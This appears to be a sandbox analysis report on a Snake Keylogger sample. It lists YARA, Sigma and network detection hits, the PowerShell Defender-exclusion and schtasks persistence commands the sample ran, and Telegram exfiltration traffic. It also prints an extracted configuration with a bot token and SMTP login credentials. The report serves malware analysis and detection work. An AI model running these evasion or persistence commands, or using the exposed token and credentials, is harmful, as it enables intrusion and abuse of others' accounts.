10.2.tjvxuavKFXO.exe.4b999b0.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
10.2.tjvxuavKFXO.exe.4b999b0.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c16:$a1: get_encryptedPassword 0x12f02:$a2: get_encryptedUsername 0x12a22:$a3: get_timePasswordChanged 0x12b1d:$a4: get_passwordField 0x12c2c:$a5: set_encryptedPassword 0x14263:$a7: get_logins 0x141c6:$a10: KeyLoggerEventArgs 0x13e31:$a11: KeyLoggerEventArgsEventHandler
10.2.tjvxuavKFXO.exe.4b999b0.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a75a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1998c:$a3: \Google\Chrome\User Data\Default\Login Data 0x19dbf:$a4: \Orbitum\User Data\Default\Login Data 0x1adfe:$a5: \Kometa\User Data\Default\Login Data
10.2.tjvxuavKFXO.exe.4b999b0.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x137d8:$s1: UnHook 0x137df:$s2: SetHook 0x137e7:$s3: CallNextHook 0x137f4:$s4: _hook
10.2.tjvxuavKFXO.exe.4b999b0.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17d6c:$x1: $%SMTPDV$ 0x165fc:$x2: $#TheHashHere%& 0x17d14:$x3: %FTPDV$ 0x1659c:$x4: $%TelegramDv$ 0x13e31:$x5: KeyLoggerEventArgs 0x141c6:$x5: KeyLoggerEventArgs 0x17d38:$m2: Clipboard Logs ID 0x17f76:$m2: Screenshot Logs ID 0x18086:$m2: keystroke Logs ID 0x18360:$m3: SnakePW 0x17f4e:$m4: \SnakeKeylogger\
10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a16:$a1: get_encryptedPassword 0x35436:$a1: get_encryptedPassword 0x14d02:$a2: get_encryptedUsername 0x35722:$a2: get_encryptedUsername 0x14822:$a3: get_timePasswordChanged 0x35242:$a3: get_timePasswordChanged 0x1491d:$a4: get_passwordField 0x3533d:$a4: get_passwordField 0x14a2c:$a5: set_encryptedPassword 0x3544c:$a5: set_encryptedPassword 0x16063:$a7: get_logins 0x36a83:$a7: get_logins 0x15fc6:$a10: KeyLoggerEventArgs 0x369e6:$a10: KeyLoggerEventArgs 0x15c31:$a11: KeyLoggerEventArgsEventHandler 0x36651:$a11: KeyLoggerEventArgsEventHandler
10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c55a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cf7a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b78c:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c1ac:$a3: \Google\Chrome\User Data\Default\Login Data 0x1bbbf:$a4: \Orbitum\User Data\Default\Login Data 0x3c5df:$a4: \Orbitum\User Data\Default\Login Data 0x1cbfe:$a5: \Kometa\User Data\Default\Login Data 0x3d61e:$a5: \Kometa\User Data\Default\Login Data
10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x155d8:$s1: UnHook 0x35ff8:$s1: UnHook 0x155df:$s2: SetHook 0x35fff:$s2: SetHook 0x155e7:$s3: CallNextHook 0x36007:$s3: CallNextHook 0x155f4:$s4: _hook 0x36014:$s4: _hook
10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19b6c:$x1: $%SMTPDV$ 0x3a58c:$x1: $%SMTPDV$ 0x183fc:$x2: $#TheHashHere%& 0x38e1c:$x2: $#TheHashHere%& 0x19b14:$x3: %FTPDV$ 0x3a534:$x3: %FTPDV$ 0x1839c:$x4: $%TelegramDv$ 0x38dbc:$x4: $%TelegramDv$ 0x15c31:$x5: KeyLoggerEventArgs 0x15fc6:$x5: KeyLoggerEventArgs 0x36651:$x5: KeyLoggerEventArgs 0x369e6:$x5: KeyLoggerEventArgs 0x19b38:$m2: Clipboard Logs ID 0x19d76:$m2: Screenshot Logs ID 0x19e86:$m2: keystroke Logs ID 0x3a558:$m2: Clipboard Logs ID 0x3a796:$m2: Screenshot Logs ID 0x3a8a6:$m2: keystroke Logs ID 0x1a160:$m3: SnakePW 0x3ab80:$m3: SnakePW 0x19d4e:$m4: \SnakeKeylogger\
0.2.customer request.exe.4d3e188.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.customer request.exe.4d3e188.4.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.customer request.exe.4d3e188.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a16:$a1: get_encryptedPassword 0x35436:$a1: get_encryptedPassword 0x14d02:$a2: get_encryptedUsername 0x35722:$a2: get_encryptedUsername 0x14822:$a3: get_timePasswordChanged 0x35242:$a3: get_timePasswordChanged 0x1491d:$a4: get_passwordField 0x3533d:$a4: get_passwordField 0x14a2c:$a5: set_encryptedPassword 0x3544c:$a5: set_encryptedPassword 0x16063:$a7: get_logins 0x36a83:$a7: get_logins 0x15fc6:$a10: KeyLoggerEventArgs 0x369e6:$a10: KeyLoggerEventArgs 0x15c31:$a11: KeyLoggerEventArgsEventHandler 0x36651:$a11: KeyLoggerEventArgsEventHandler
0.2.customer request.exe.4d3e188.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c55a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cf7a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b78c:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c1ac:$a3: \Google\Chrome\User Data\Default\Login Data 0x1bbbf:$a4: \Orbitum\User Data\Default\Login Data 0x3c5df:$a4: \Orbitum\User Data\Default\Login Data 0x1cbfe:$a5: \Kometa\User Data\Default\Login Data 0x3d61e:$a5: \Kometa\User Data\Default\Login Data
0.2.customer request.exe.4d3e188.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x155d8:$s1: UnHook 0x35ff8:$s1: UnHook 0x155df:$s2: SetHook 0x35fff:$s2: SetHook 0x155e7:$s3: CallNextHook 0x36007:$s3: CallNextHook 0x155f4:$s4: _hook 0x36014:$s4: _hook
0.2.customer request.exe.4d3e188.4.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19b6c:$x1: $%SMTPDV$ 0x3a58c:$x1: $%SMTPDV$ 0x183fc:$x2: $#TheHashHere%& 0x38e1c:$x2: $#TheHashHere%& 0x19b14:$x3: %FTPDV$ 0x3a534:$x3: %FTPDV$ 0x1839c:$x4: $%TelegramDv$ 0x38dbc:$x4: $%TelegramDv$ 0x15c31:$x5: KeyLoggerEventArgs 0x15fc6:$x5: KeyLoggerEventArgs 0x36651:$x5: KeyLoggerEventArgs 0x369e6:$x5: KeyLoggerEventArgs 0x19b38:$m2: Clipboard Logs ID 0x19d76:$m2: Screenshot Logs ID 0x19e86:$m2: keystroke Logs ID 0x3a558:$m2: Clipboard Logs ID 0x3a796:$m2: Screenshot Logs ID 0x3a8a6:$m2: keystroke Logs ID 0x1a160:$m3: SnakePW 0x3ab80:$m3: SnakePW 0x19d4e:$m4: \SnakeKeylogger\
0.2.customer request.exe.4d1d568.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.customer request.exe.4d1d568.5.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.customer request.exe.4d1d568.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a16:$a1: get_encryptedPassword 0x35636:$a1: get_encryptedPassword 0x56056:$a1: get_encryptedPassword 0x14d02:$a2: get_encryptedUsername 0x35922:$a2: get_encryptedUsername 0x56342:$a2: get_encryptedUsername 0x14822:$a3: get_timePasswordChanged 0x35442:$a3: get_timePasswordChanged 0x55e62:$a3: get_timePasswordChanged 0x1491d:$a4: get_passwordField 0x3553d:$a4: get_passwordField 0x55f5d:$a4: get_passwordField 0x14a2c:$a5: set_encryptedPassword 0x3564c:$a5: set_encryptedPassword 0x5606c:$a5: set_encryptedPassword 0x16063:$a7: get_logins 0x36c83:$a7: get_logins 0x576a3:$a7: get_logins 0x15fc6:$a10: KeyLoggerEventArgs 0x36be6:$a10: KeyLoggerEventArgs 0x57606:$a10: KeyLoggerEventArgs
0.2.customer request.exe.4d1d568.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c55a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d17a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x5db9a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b78c:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c3ac:$a3: \Google\Chrome\User Data\Default\Login Data 0x5cdcc:$a3: \Google\Chrome\User Data\Default\Login Data 0x1bbbf:$a4: \Orbitum\User Data\Default\Login Data 0x3c7df:$a4: \Orbitum\User Data\Default\Login Data 0x5d1ff:$a4: \Orbitum\User Data\Default\Login Data 0x1cbfe:$a5: \Kometa\User Data\Default\Login Data 0x3d81e:$a5: \Kometa\User Data\Default\Login Data 0x5e23e:$a5: \Kometa\User Data\Default\Login Data
0.2.customer request.exe.4d1d568.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x155d8:$s1: UnHook 0x361f8:$s1: UnHook 0x56c18:$s1: UnHook 0x155df:$s2: SetHook 0x361ff:$s2: SetHook 0x56c1f:$s2: SetHook 0x155e7:$s3: CallNextHook 0x36207:$s3: CallNextHook 0x56c27:$s3: CallNextHook 0x155f4:$s4: _hook 0x36214:$s4: _hook 0x56c34:$s4: _hook
0.2.customer request.exe.4d1d568.5.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19b6c:$x1: $%SMTPDV$ 0x3a78c:$x1: $%SMTPDV$ 0x5b1ac:$x1: $%SMTPDV$ 0x183fc:$x2: $#TheHashHere%& 0x3901c:$x2: $#TheHashHere%& 0x59a3c:$x2: $#TheHashHere%& 0x19b14:$x3: %FTPDV$ 0x3a734:$x3: %FTPDV$ 0x5b154:$x3: %FTPDV$ 0x1839c:$x4: $%TelegramDv$ 0x38fbc:$x4: $%TelegramDv$ 0x599dc:$x4: $%TelegramDv$ 0x15c31:$x5: KeyLoggerEventArgs 0x15fc6:$x5: KeyLoggerEventArgs 0x36851:$x5: KeyLoggerEventArgs 0x36be6:$x5: KeyLoggerEventArgs 0x57271:$x5: KeyLoggerEventArgs 0x57606:$x5: KeyLoggerEventArgs 0x19b38:$m2: Clipboard Logs ID 0x19d76:$m2: Screenshot Logs ID 0x19e86:$m2: keystroke Logs ID
Click to see the 47 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\customer request.exe", ParentImage: C:\Users\user\Desktop\customer request.exe, ParentProcessId: 6848, ParentProcessName: customer request.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe", ProcessId: 5344, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp7D04.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp7D04.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe, ParentImage: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe, ParentProcessId: 7348, ParentProcessName: tjvxuavKFXO.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp7D04.tmp", ProcessId: 7436, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BAE.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BAE.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\customer request.exe", ParentImage: C:\Users\user\Desktop\customer request.exe, ParentProcessId: 6848, ParentProcessName: customer request.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BAE.tmp", ProcessId: 2084, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\customer request.exe", ParentImage: C:\Users\user\Desktop\customer request.exe, ParentProcessId: 6848, ParentProcessName: customer request.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe", ProcessId: 5344, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BAE.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BAE.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\customer request.exe", ParentImage: C:\Users\user\Desktop\customer request.exe, ParentProcessId: 6848, ParentProcessName: customer request.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BAE.tmp", ProcessId: 2084, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T19:40:48.070862+0100	2803305	3	Unknown Traffic	192.168.2.4	49739	104.21.16.1	443	TCP
2025-02-18T19:40:55.731632+0100	2803305	3	Unknown Traffic	192.168.2.4	49750	104.21.16.1	443	TCP
2025-02-18T19:40:57.098224+0100	2803305	3	Unknown Traffic	192.168.2.4	49754	104.21.16.1	443	TCP
2025-02-18T19:40:59.034259+0100	2803305	3	Unknown Traffic	192.168.2.4	49758	104.21.16.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T19:40:46.612846+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49736	193.122.6.168	80	TCP
2025-02-18T19:40:47.505160+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49736	193.122.6.168	80	TCP
2025-02-18T19:40:49.816049+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49741	193.122.6.168	80	TCP
2025-02-18T19:40:52.149580+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49742	193.122.6.168	80	TCP
2025-02-18T19:40:52.315974+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49744	193.122.6.168	80	TCP
2025-02-18T19:40:53.730477+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49742	193.122.6.168	80	TCP
2025-02-18T19:40:53.972228+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49746	193.122.6.168	80	TCP
2025-02-18T19:40:55.144102+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49742	193.122.6.168	80	TCP
2025-02-18T19:40:55.184666+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49749	193.122.6.168	80	TCP
2025-02-18T19:40:58.472250+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49752	193.122.6.168	80	TCP

ETPRO MALWARE Snake Keylogger Telegram Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T19:41:04.717048+0100	2853006	1	A Network Trojan was detected	192.168.2.4	62946	149.154.167.220	443	TCP
2025-02-18T19:41:16.521382+0100	2853006	1	A Network Trojan was detected	192.168.2.4	62955	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T19:41:04.383742+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	62946	149.154.167.220	443	TCP
2025-02-18T19:41:16.091536+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	62955	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7347885220:AAFmOXgoc0UBDpYJA8OUR6HtUv-Uevo_Ttc/sendMessage?chat_id=6939220311", "Username": "muhasebe@gzdled.com.tr", "Password": "Gozdeled1048", "Host": "mail.gzdled.com.tr", "Port": "587", "Token": "7347885220:AAFmOXgoc0UBDpYJA8OUR6HtUv-Uevo_Ttc", "Chat_id": "6939220311", "Version": "5.1"}
Source: tjvxuavKFXO.exe.7488.13.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7347885220:AAFmOXgoc0UBDpYJA8OUR6HtUv-Uevo_Ttc/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Virustotal: Detection: 35%			Perma Link

Multi AV Scanner detection for submitted file

Source: customer request.exe	ReversingLabs: Detection: 29%
Source: customer request.exe	Virustotal: Detection: 35%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack	String decryptor: muhasebe@gzdled.com.tr
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack	String decryptor: Gozdeled1048
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack	String decryptor: mail.gzdled.com.tr
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack	String decryptor: flexcomgeneralmerchants@outlook.com
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack	String decryptor: 587
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack	String decryptor:
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack	String decryptor: 7347885220:AAFmOXgoc0UBDpYJA8OUR6HtUv-Uevo_Ttc
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack	String decryptor: 6939220311

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: customer request.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49737 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49747 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:62946 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:62955 version: TLS 1.2

Source: customer request.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 07A3E65Fh	0_2_07A3EB8B
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 0121F1F6h	8_2_0121F007
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 0121FB80h	8_2_0121F007
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_0121E528
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_0121EB5B
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_0121ED3C
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 056F1A38h	8_2_056F1966
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 056F1011h	8_2_056F0D60
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 056FF009h	8_2_056FED60
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 056FBBE9h	8_2_056FB940
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 056FEBB1h	8_2_056FE908
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 056F0BB1h	8_2_056F0900
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 056FC499h	8_2_056FC1F0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 056F1471h	8_2_056F11C0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 056FF461h	8_2_056FF1B8
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 056FC041h	8_2_056FBD98
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 056F02F1h	8_2_056F0040
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 056FE301h	8_2_056FE058
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 056FDEA9h	8_2_056FDC00
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 056FB791h	8_2_056FB4E8
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 056F0751h	8_2_056F04A0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 056FE759h	8_2_056FE4B0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 056FD5F9h	8_2_056FD350
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 056FDA51h	8_2_056FD7A8
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 056FFD11h	8_2_056FFA68
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 056FC8F1h	8_2_056FC648
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 056F1A38h	8_2_056F1620
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 056FF8B9h	8_2_056FF610
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 056F1A38h	8_2_056F1610
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 056FD1A1h	8_2_056FCEF8
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 056FCD49h	8_2_056FCAA0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 06958945h	8_2_06958608
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 069572FAh	8_2_06957050
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	8_2_069536CE
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 06956171h	8_2_06955EC8
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 069558C1h	8_2_06955618
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 06955D19h	8_2_06955A70
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	8_2_069533B8
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	8_2_069533A8
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 06956E79h	8_2_06956BD0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 069565C9h	8_2_06956320
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 06956A21h	8_2_06956778
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 06950741h	8_2_06950498
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 06957751h	8_2_069574A8
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 06950B99h	8_2_069508F0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 069502E9h	8_2_06950040
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 06955441h	8_2_06955198
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 06958459h	8_2_069581B0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 06957BA9h	8_2_06957900
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 06958001h	8_2_06957D58
Source: C:\Users\user\Desktop\customer request.exe	Code function: 4x nop then jmp 06950FF1h	8_2_06950D48
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 02A9F055h	13_2_02A9EE68
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 02A9F9DFh	13_2_02A9EE68
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	13_2_02A9E388
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	13_2_02A9EB9B
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	13_2_02A9E9BB
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 05251471h	13_2_052511C0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 052502F1h	13_2_05250040
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 05251A38h	13_2_05251620
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 05250BB1h	13_2_05250900
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 0525EBB1h	13_2_0525E908
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 4x nop then jmp 05251A38h	13_2_05251966
